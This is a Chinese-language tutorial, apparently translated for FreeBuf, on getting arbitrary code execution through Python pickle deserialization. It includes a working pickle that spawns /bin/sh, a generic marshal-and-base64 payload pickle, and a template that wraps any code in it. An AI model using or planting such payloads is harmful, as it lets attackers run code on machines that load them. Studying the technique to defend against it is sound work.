大量实践证明构建恶意的pickle非常容易,而对恶意pickle进行unpickle操作将可能会产生一个shell,甚至是一个远程shell。所以,本文中将向大家介绍如何利用Python pickle进行任意代码执行操作。

0×00 Python pickle禁忌

对于不是自己从已知数据中创建的Python pickle,不要对其进行unpickle操作,这是老生常谈的话题了。同时,pickle模块的Python文档中清晰地陈述道:

警告:对于错误的或恶意构造的数据来说,pickle模块并不能保证是安全的。绝对不要unpickle从不可信的或未经身份验证的信息源接收到的数据。

Nelson Elhage演示了通过使用subprocess.Popen来获取一个远程shell的简单过程。Marco Slaviero展示了如何构建各种标准的shellcode,包括绑定和连接shellcode,但这些基本上是不可读的,并且在pickle中编程只是无意义的娱乐消遣,甚至是完全没必要的,这一点我将在后文中展示。

0×01 pickle举例

首先,我们以Python pickle shellcode的canonical开始,我将其保存为canonical.pickle。

# canonical.pickle
cos
system
(S'/bin/sh'
tR.

接着,我们试着解包这个pickle,看看会产生什么结果。

>>> import pickle
>>> pickle.load(open('canonical.pickle'))
sh-3.2$

0×02 pickle简介

Pickle是一种堆栈语言,这意味着pickle指令将数据压入堆栈或者将数据弹出堆栈,并以某种方式操作它。为了理解canonical pickle是如何工作的,我们只需要理解6条pickle指令:

1、c:读取新的一行作为模块名module,读取下一行作为对象名object,然后将module.object压入到堆栈中。
2、(:将一个标记对象插入到堆栈中。为了实现我们的目的,该指令会与t搭配使用,以产生一个元组。
3、t:从堆栈中弹出对象,直到一个“(”被弹出,并创建一个包含弹出对象(除了“(”)的元组对象,并且这些对象的顺序必须跟它们压入堆栈时的顺序一致。然后,该元组被压入到堆栈中。
4、S:读取引号中的字符串直到换行符处,然后将它压入堆栈。
5、R:将一个元组和一个可调用对象弹出堆栈,然后以该元组作为参数调用该可调用的对象,最后将结果压入到堆栈中。
6、.:结束pickle。

为了执行任意Python代码,以上指令是我们需要掌握的所有指令。

0×03 代码分析

接着,看一下canonical pickle shellcode。我们看到,内建函数os.system首先被压入了堆栈中。接着,一个标记对象和字符串“/bin/sh”也被压入堆栈。指令t产生了一个只包含1个元素的元组(’/bin/sh’,)。此时,堆栈中包含了两个元素:

os.system和(’/bin/sh’,)。指令R将以上两个元素都弹出堆栈,并调用os.system(‘/bin/sh’),然后将执行结果(shell返回值)压入堆栈中。

为了执行任意python代码,我们希望能够pickle代码。然而,这并不能行得通。不过幸运的是,Python 2.6之后的版本中包含了一个marshal模块,利用该模块就能对代码进行序列化操作。我们的基本任务是编写任意代码作为一个Python函数,对该函数进行marshal操作,并以base64方式对其编码,然后将其插入到一个通用的pickle中,而在这里pickle将会对其进行解码、unmarshal操作,并调用这个函数。

0×04 获取shell示例

对于我们的任意计算,我们先慢慢地计算10阶斐波那契数,并将其打印出来,然后得到一个shell。

import marshal
import base64
def foo():    
    import os    
    def fib(n):        
        if n <= 1:            
            return n        
        return fib(n-1) + fib(n-2)    
    print 'fib(10) =', fib(10)    os.system('/bin/sh')
print base64.b64encode(marshal.dumps(foo.func_code))

注意,因为Python允许我们导入模块,以及在函数内部定义函数,所以我们可以在我们的foo函数中编写想要的任何代码。

运行此代码生成以下内容:

YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMEAAAAYS5weVIBAAAABgAAAHMGAAAAAAEMAQQBcwkAAABmaWIoMTApID1pCgAAAHMHAAAAL2Jpbi9zaCgCAAAAdAIAAABvc3QGAAAAc3lzdGVtKAEAAABSAgAAACgAAAAAKAEAAABSAQAAAHMEAAAAYS5weXQDAAAAZm9vBAAAAHMIAAAAAAEMAQ8EDwE=

0×05 创建通用pickle

我们想要创建一个通用的pickle,这样我们可以向其中插入任意base64编码的函数并运行它们,比如上面编写的函数。从本质上讲,我们希望产生一个可以执行下面的Python代码的pickle,其中的code_enc就是我们编码后的函数。

(types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))()

为了让其具有更好的可读性,调整其格式如下:

code_str = base64.b64decode(code_enc)
code = marshal.loads(code_str)
func = types.FunctionType(code, globals(), '')
func()

接着,让我们一点一点构建这部分。为了调用base64.b64decode(code_enc),我们模仿前面用os.system做的操作。

cbase64
b64decode
(S'YwAAA...'
tR

我们可以以相同的方式将调用对象添加到marshal.loads中:

cmarshal
loads
(cbase64
b64decode
(S'YwAAA...'
tRtR

通过使用__builtin__模块,可以以相同的方式调用函数globals:

c__builtin__
globals
(tR

为了构建函数,我们可以将这些结合到一起,然后得到:

ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'YwAAA...'
tRtRc__builtin__
globals
(tRS''
tR

最后,我们需要通过附加“(tR.”(其中句号结束了pickle)来调用堆栈顶部的函数。

将这些片段组合在一起,我们就得到了一个通用的pickle。

# generic.pickle
ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMEAAAAYS5weVIBAAAABgAAAHMGAAAAAAEMAQQBcwkAAABmaWIoMTApID1pCgAAAHMHAAAAL2Jpbi9zaCgCAAAAdAIAAABvc3QGAAAAc3lzdGVtKAEAAABSAgAAACgAAAAAKAEAAABSAQAAAHMEAAAAYS5weXQDAAAAZm9vBAAAAHMIAAAAAAEMAQ8EDwE='
tRtRc__builtin__
globals
(tRS''
tR(tR.
>>> import pickle
>>> pickle.load(open('generic.pickle'))
fib(10) = 55
sh-3.2$

0×06 模板代码

另外,改变可执行代码仅仅需要改变foo函数,运行打印出marshal处理过和编码后的函数的Python程序,然后在替换generic.pickle中base64编码的字符串。

下面是一个很方便的模板。

# template.py
import marshal
import base64
def foo():    
    pass # Your code here
    
print """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'tRtRc__builtin__
globals
(tRS''tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

*原文地址:cs.uic.eduJackFree编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.com)

源链接

Hacking more

...